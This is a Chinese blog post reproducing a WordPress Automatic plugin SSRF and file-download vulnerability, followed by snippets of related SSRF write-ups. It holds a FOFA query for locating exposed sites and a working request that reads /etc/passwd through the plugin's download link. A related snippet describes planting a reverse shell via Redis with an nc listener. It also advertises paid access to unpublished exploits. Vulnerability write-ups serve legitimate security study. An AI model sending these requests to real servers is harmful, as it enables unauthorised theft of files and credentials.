【漏洞复现】WordPress AutomaticPlugin SSRF漏洞

原创 已于 2024-04-02 14:57:40 修改 · 735 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

于 2024-04-02 14:34:20 首次发布
文章揭示了WordPress插件wp_automatic存在未经验证的任意文件下载和SSRF漏洞,影响AUTOMATTIC版本。攻击者可通过特定URL下载敏感数据。漏洞复现和更多安全信息需通过圈子获取。

一、漏洞简介

WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。

二、影响版本

  • AUTOMATTIC-WordPress

三、资产测绘

  • fofa:app="AUTOMATTIC-WordPress" && icon_hash="1198047028"

四、漏洞复现

地址 >>> 漏洞详情及批量检测POC请前往圈子获取,加入圈子获取更多未公开漏洞POC

限时优惠券:入圈立减40

圈子福利:每天更新1-2个0/1day,Nday每天不低于5个,漏洞整理900+

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/si
最低0.47元/天 解锁文章
漏洞复现WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
qq_67810151的博客
03-27 770
WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。
WordPress AutomaticPlugin SSRF漏洞复现(CVE-2024-27954)
0xSec
03-31 1036
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
WordPress xmlrpc.php SSRF漏洞复现
god_Zeo的安全博客
11-23 4364
0x01 WordPress xmlrpc.php 存在SSRF漏洞 通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。 0x02影响版本 WordPress 版本< 3.5.1 造成的影响 1、可以对业务内网进行探测。 2、攻击运行在内网或本地的应用程序(比如溢出攻击)。 3、利用file协议读取本地文件等 0x03漏洞验证 第一步:直接访问这个文件,初步判断 第二步:发现POC验证数据包 需要修改三处地方:例如:w
WordPress 4.4 SSRF
乐枕的家
08-22 2991
通过这个漏洞熟悉一下WP的代码。数据跟踪[xmlrpc.php] 获取POST的数据$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );创建xmlrpc_server,使用serve_request()方法处理输入。$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_cl
Automatic Plugin -WordPress自动采集插件 v3.56.0
metup的博客
06-29 1111
WordPress Automatic Plugin自动采集有针对性的高质量的文章文章,比如 亚马逊产品、 Clickbank 产品、 Youtube 视频、 Vimeo 视频、 Feeds posts、 eBay 拍卖、 Flicker images、 Instagram 图像、 Pinterest pins,tweets,facebook 网站和 SoundCloud 歌曲,只是安装和许可,为你的博客工作,它将工作 24/7 ·····​...
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1881
网络安全自学日志-漏洞复现篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人复现笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
wordpress漏洞_实战Wordpres的CSRF漏洞利用
weixin_39575212的博客
12-12 505
Wordpress简介Wordpress是使用PHP语言开发的博客平台,用户可以在支持PHP和,MySQL数据库的服务器上架设属于自己的网站,也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理软件,他是使用PHP和MySQL数据库开发的。安装WordPress环境1、 下载wordpress压缩包,解压到phpstudy的...
SSRF漏洞复现
m0_65665796的博客
08-25 845
在这个IP地址下只开放了80端口,那这个时候好像有些束手无策了,但是我们转换思想,为什么不能存在其他ip地址呢,这毕竟是内网,我们便可以探测该网段上存活的主机了,这里我手动探查172.21.0.1,发现这个ip并没有什么反应。但是我们查看/etc/shadow就不可,因为我们的权限不够,那我们使用dict协议看看服务器本地开启了哪些端口,经过测试,发现没有明显的反馈,那我们可以看一下页面返回值,来猜测。172.21.0.3,在这个ip下,出现了不一样的结果,该漏洞需要部署在Linux下,拉取docker。
ssrf漏洞之——漏洞复现
V_vevive的博客
08-25 963
6.发送三条redis命令,即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口,ip可自己更改,之后在192.168.16.131上使用nc监听4444端口,输入nc -lvvp 4444 开启监听。将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令),替换url发送,过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell。将页面请求的url改为指定本地文件路径的url。
ssrf漏洞复现
Wincreds的博客
08-25 643
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
最新发布
Future_Hk的博客
09-05 295
nmap起手5.6.2符合漏洞利用版本来到后台存在用户名test-corp默认用户存在弱口令test来到漏洞利用页面><!%init;%trick;创建恶意WAV文件创建dtd文件p=%file;'>" >开启端口我们上传wav文件??查看wp-config.php将路径改为。
SSRF漏洞
weixin_61143354的博客
08-08 1081
网络安全笔记
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)(含批量验证poc)
weixin_43567873的博客
03-30 334
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
WordPress Automatic Plugin 自动采集发布插件 开心专业版 – 更至v3.55
okmad的博客
02-12 2298
WordPress 自动插件几乎可以自动将任何网站上的帖子发布到 WordPress。 该插件为英文原版,如需WP-Automatic v3.55 汉化包请移步。 它可以使用它们的 API 从 Youtube 和 Twitter 等流行网站导入,也可以使用其抓取模块从您选择的几乎任何网站导入。 wordpress 自动插件发布质量目标文章,亚马逊产品,Clickbank 产品,Youtube 视频,Vimeo 视频,Feeds 帖子,eBay 拍卖,闪烁图像,Instagram 图像,Pinterest 图
WordPress插件radio存在SSRF(CVE-2024-54385)
swordheart的博客
05-26 175
WordPress插件radio存在SSRF(CVE-2024-54385)
WordPress Automatic 插件任意文件下载(CVE-2024-27954 )
wan___she__pi的博客
03-29 631
WordPress Automatic 插件<3.92.1易受未经验证的任意文件下载攻击。下载位置位于downloader.php文件中,允许攻击者从网站下载文件,导致敏感数据外泄。影响版本:WordPress Automatic Plugin <3.92.1。get类型(为了好看就放上面的图,实际验证下面的就行)
【学习笔记】WordPress <4.5 SSRF
chualam的博客
11-01 338
SSRF服务端请求伪造 php中常见的涉及对远程资源访问的函数 fsockopen()file_get_content() curl_exec() 主要是通过request的方法 wordpress对请求的url有过滤:wp-includes/ http.php wp_http_vaildate_url进行url判断 js中的trim是删除特定符号的意思 preg_match执行正则表达式匹配 curl接受八进制 因此可以绕过ip地址段的正则表达式 有可能请求没有回显 但是可以通过nc来..
wordpress函数wp_http_validate_url畸形IP绕过验证SSRF漏洞
weixin_33738982的博客
11-23 217
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞复现WordPress-Automatic-Plugin任意文件读取(CVE-2024-27954)
知黑而守白
04-01 341
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。
复现weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,例如攻击内部应用程序或数据。为了防止此类漏洞的利用,建议管理员及时更新WebLogic服务器的补丁程序,并加强网络安全防护措施。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值